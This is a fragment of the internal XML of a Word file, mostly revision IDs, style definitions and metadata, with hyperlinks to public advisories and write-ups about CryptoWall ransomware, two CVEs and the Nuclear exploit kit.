    <w:rsid w:val="00492B9D"/>
    <w:rsid w:val="004938AF"/>
    <w:rsid w:val="00495F8C"/>
    <w:rsid w:val="004A28E6"/>
    <w:rsid w:val="004A6508"/>
    <w:rsid w:val="004C3832"/>
    <w:rsid w:val="004E7F8A"/>
    <w:rsid w:val="004F3067"/>
    <w:rsid w:val="0050095E"/>
    <w:rsid w:val="0053321C"/>
    <w:rsid w:val="005411A7"/>
    <w:rsid w:val="00543D3F"/>
    <w:rsid w:val="005510D0"/>
    <w:rsid w:val="00566896"/>
    <w:rsid w:val="005966B9"/>
    <w:rsid w:val="00597FC9"/>
    <w:rsid w:val="005B3ACC"/>
    <w:rsid w:val="005C243B"/>
    <w:rsid w:val="005C55E4"/>
    <w:rsid w:val="005D0A00"/>
    <w:rsid w:val="005E3D81"/>
    <w:rsid w:val="005F333C"/>
    <w:rsid w:val="00602688"/>
    <w:rsid w:val="00607637"/>
    <w:rsid w:val="00615F23"/>
    <w:rsid w:val="006168A4"/>
    <w:rsid w:val="00616C54"/>
    <w:rsid w:val="0062194C"/>
    <w:rsid w:val="00654F3B"/>
    <w:rsid w:val="0065545B"/>
    <w:rsid w:val="006565A8"/>
    <w:rsid w:val="00662158"/>
    <w:rsid w:val="00662C2F"/>
    <w:rsid w:val="006778E5"/>
    <w:rsid w:val="00685985"/>
    <w:rsid w:val="0069105D"/>
    <w:rsid w:val="006D5725"/>
    <w:rsid w:val="006D62FF"/>
    <w:rsid w:val="006F13A8"/>
    <w:rsid w:val="007029A1"/>
    <w:rsid w:val="007044A7"/>
    <w:rsid w:val="007252DF"/>
    <w:rsid w:val="00732326"/>
    <w:rsid w:val="007410EF"/>
    <w:rsid w:val="00742125"/>
    <w:rsid w:val="00752AA8"/>
    <w:rsid w:val="0075317B"/>
    <w:rsid w:val="0077542C"/>
    <w:rsid w:val="0079296B"/>
    <w:rsid w:val="00795546"/>
    <w:rsid w:val="007A018B"/>
    <w:rsid w:val="007A45E1"/>
    <w:rsid w:val="007A5005"/>
    <w:rsid w:val="007B1C92"/>
    <w:rsid w:val="007F4134"/>
    <w:rsid w:val="008177A4"/>
    <w:rsid w:val="0082319C"/>
    <w:rsid w:val="0084797A"/>
    <w:rsid w:val="00867747"/>
    <w:rsid w:val="00870349"/>
    <w:rsid w:val="008727C6"/>
    <w:rsid w:val="00885663"/>
    <w:rsid w:val="00887510"/>
    <w:rsid w:val="008A20B1"/>
    <w:rsid w:val="008F13B3"/>
    <w:rsid w:val="00911154"/>
    <w:rsid w:val="00912DF3"/>
    <w:rsid w:val="00915378"/>
    <w:rsid w:val="00926457"/>
    <w:rsid w:val="00950159"/>
    <w:rsid w:val="00955F57"/>
    <w:rsid w:val="00975461"/>
    <w:rsid w:val="00981B06"/>
    <w:rsid w:val="00985144"/>
    <w:rsid w:val="009C0AE7"/>
    <w:rsid w:val="009C1900"/>
    <w:rsid w:val="009C7141"/>
    <w:rsid w:val="009D029E"/>
    <w:rsid w:val="009D53A8"/>
    <w:rsid w:val="009D6121"/>
    <w:rsid w:val="009E2036"/>
    <w:rsid w:val="009E4FA3"/>
    <w:rsid w:val="009E5891"/>
    <w:rsid w:val="00A0171A"/>
    <w:rsid w:val="00A01D0B"/>
    <w:rsid w:val="00A02492"/>
    <w:rsid w:val="00A043E0"/>
    <w:rsid w:val="00A05417"/>
    <w:rsid w:val="00A05AA5"/>
    <w:rsid w:val="00A22420"/>
    <w:rsid w:val="00A334E4"/>
    <w:rsid w:val="00A42099"/>
    <w:rsid w:val="00A51424"/>
    <w:rsid w:val="00A55CFB"/>
    <w:rsid w:val="00A63B7F"/>
    <w:rsid w:val="00A6667B"/>
    <w:rsid w:val="00A76618"/>
    <w:rsid w:val="00A85A2B"/>
    <w:rsid w:val="00A86AF4"/>
    <w:rsid w:val="00AD071E"/>
    <w:rsid w:val="00AD38A5"/>
    <w:rsid w:val="00AE55E2"/>
    <w:rsid w:val="00AF326B"/>
    <w:rsid w:val="00AF6DDB"/>
    <w:rsid w:val="00B102DD"/>
    <w:rsid w:val="00B11DAE"/>
    <w:rsid w:val="00B124EE"/>
    <w:rsid w:val="00B24D50"/>
    <w:rsid w:val="00B35103"/>
    <w:rsid w:val="00B376A1"/>
    <w:rsid w:val="00B470BB"/>
    <w:rsid w:val="00B51A8E"/>
    <w:rsid w:val="00B52469"/>
    <w:rsid w:val="00B5533C"/>
    <w:rsid w:val="00B67CF9"/>
    <w:rsid w:val="00B72DD6"/>
    <w:rsid w:val="00B94DDF"/>
    <w:rsid w:val="00B94F39"/>
    <w:rsid w:val="00BA0F28"/>
    <w:rsid w:val="00BB110F"/>
    <w:rsid w:val="00BC212A"/>
    <w:rsid w:val="00BF2E60"/>
    <w:rsid w:val="00BF4737"/>
    <w:rsid w:val="00BF4742"/>
    <w:rsid w:val="00BF50FB"/>
    <w:rsid w:val="00C029DF"/>
    <w:rsid w:val="00C03ACF"/>
    <w:rsid w:val="00C06EE9"/>
    <w:rsid w:val="00C21E67"/>
    <w:rsid w:val="00C32455"/>
    <w:rsid w:val="00C42530"/>
    <w:rsid w:val="00C46205"/>
    <w:rsid w:val="00C5012B"/>
    <w:rsid w:val="00C50E93"/>
    <w:rsid w:val="00C52DF2"/>
    <w:rsid w:val="00C60358"/>
    <w:rsid w:val="00C6433E"/>
    <w:rsid w:val="00C870D2"/>
    <w:rsid w:val="00C979DB"/>
    <w:rsid w:val="00CB1470"/>
    <w:rsid w:val="00CB484D"/>
    <w:rsid w:val="00CC49C7"/>
    <w:rsid w:val="00CD2652"/>
    <w:rsid w:val="00CD34AD"/>
    <w:rsid w:val="00CE634D"/>
    <w:rsid w:val="00D0408E"/>
    <w:rsid w:val="00D10834"/>
    <w:rsid w:val="00D12890"/>
    <w:rsid w:val="00D12C46"/>
    <w:rsid w:val="00D20FAB"/>
    <w:rsid w:val="00D549B7"/>
    <w:rsid w:val="00D64986"/>
    <w:rsid w:val="00D703E8"/>
    <w:rsid w:val="00D76104"/>
    <w:rsid w:val="00D77948"/>
    <w:rsid w:val="00D86F36"/>
    <w:rsid w:val="00DA2596"/>
    <w:rsid w:val="00DD0B3E"/>
    <w:rsid w:val="00DE4BF8"/>
    <w:rsid w:val="00DF71AC"/>
    <w:rsid w:val="00E05AEF"/>
    <w:rsid w:val="00E21BA5"/>
    <w:rsid w:val="00E2293F"/>
    <w:rsid w:val="00E245EA"/>
    <w:rsid w:val="00E308FC"/>
    <w:rsid w:val="00E30E0C"/>
    <w:rsid w:val="00E364E7"/>
    <w:rsid w:val="00E377CA"/>
    <w:rsid w:val="00E549F5"/>
    <w:rsid w:val="00E620AC"/>
    <w:rsid w:val="00E6297D"/>
    <w:rsid w:val="00E8614D"/>
    <w:rsid w:val="00E86338"/>
    <w:rsid w:val="00EA38E6"/>
    <w:rsid w:val="00ED7396"/>
    <w:rsid w:val="00EE4CBF"/>
    <w:rsid w:val="00F1789C"/>
    <w:rsid w:val="00F340AA"/>
    <w:rsid w:val="00F34513"/>
    <w:rsid w:val="00F434A7"/>
    <w:rsid w:val="00F4611E"/>
    <w:rsid w:val="00F62138"/>
    <w:rsid w:val="00F6320E"/>
    <w:rsid w:val="00F732D9"/>
    <w:rsid w:val="00F824AC"/>
    <w:rsid w:val="00F84370"/>
    <w:rsid w:val="00F90012"/>
    <w:rsid w:val="00F91BB4"/>
    <w:rsid w:val="00FA3584"/>
    <w:rsid w:val="00FB11ED"/>
    <w:rsid w:val="00FB49BA"/>
    <w:rsid w:val="00FC582F"/>
    <w:rsid w:val="00FD079E"/>
    <w:rsid w:val="00FD1CB9"/>
    <w:rsid w:val="00FE23A3"/>
    <w:rsid w:val="00FF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D4188"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B8DD9D63-9CEB-4765-B6F4-CD8CE4B6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9BA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B94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D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4D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0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E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E9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A650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245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5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0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6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4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4D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4D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1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223C5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="highlight">
    <w:name w:val="highlight"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC49C7"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLDefinition">
    <w:name w:val="HTML Definition"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC49C7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="style-scope">
    <w:name w:val="style-scope"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F90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01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-secure.com/v-descs/trojan_w32_cryptowall.s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-secure.com/documents/996508/1030743/Threat_Report_2015.pdf" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/exploits-mal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vd.nist.gov/vuln/detail/CVE-2013-0074" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isc.sans.edu/forums/diary/Nuclear+EK+traffic+patterns+in+August+2015/20001/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2015-0311" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threats/nucle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ymantec.com/security-center/writeup/2014-061923-2824-9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1501</Words>
  <Characters>8560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Haynes</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Julie Haynes</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-21T15:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-21T15:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>